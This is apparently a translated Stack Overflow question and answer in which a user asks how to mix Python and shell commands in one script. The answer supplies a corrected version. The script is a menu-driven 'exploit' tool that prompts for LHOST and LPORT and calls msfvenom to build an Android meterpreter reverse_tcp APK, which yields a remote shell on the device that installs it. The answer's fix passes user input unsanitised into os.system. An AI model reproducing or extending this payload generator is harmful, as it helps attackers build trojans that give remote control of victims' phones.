python - 将 py 和 sh 代码合并到一个文件中

标签 python linux bash shell sh

我想知道如何将 sh 和 py 代码合并到一个文件中,然后执行它。我应该以什么格式保存它以及执行它的命令?



Print("hello welcome to test")

print("to exploit android enter 1")
print("to exploit windows enter 2")

user_response = input(">")
if user_response == 1:
    print("you have seclected android")
    lhost = input("Please type in ur ip adress > ")
    lport = input("Please type in ur recommended port to use > ")
    print("the apk installable is placed on ur desktop")
    print("we are using reverse_tcp")
    print("the LHOST is",lhost)
    print("the LPORT is",lport)
    !msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
    print("the apk is located in ur Desktop")
    !service postgresql start
elif user_response == 2:
    bla ..
    bla .. 
    bla ..
    testing bla bla bla


可以。您必须导入 os 模块并像这样包装您的 shell 命令:os.system("ls -l")。 Source



print("hello welcome to test")
import os
print("to exploit android enter 1")
print("to exploit windows enter 2")

user_response = input(">")
if user_response == str(1):
    print("you have seclected android")
    lhost = input("Please type in ur ip adress > ")
    lport = input("Please type in ur recommended port to use > ")
    print("the apk installable is placed on ur desktop")
    print("we are using reverse_tcp")
    print("the LHOST is",lhost)
    print("the LPORT is",lport)
    os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=" + str(lhost) + " LPORT=" + str(lport) + " R> /root/Desktop")
    print("the apk is located in ur Desktop")
    os.system("service postgresql start")
elif user_response == str(2):
    bla ..
    bla .. 
    bla ..
    testing bla bla bla

Linux 不关心文件扩展名,但它仍然是一个 python 脚本,所以你应该使用 .py。执行它的命令是“python3”。请记住,您必须使用“chmod 755”设置可执行权限

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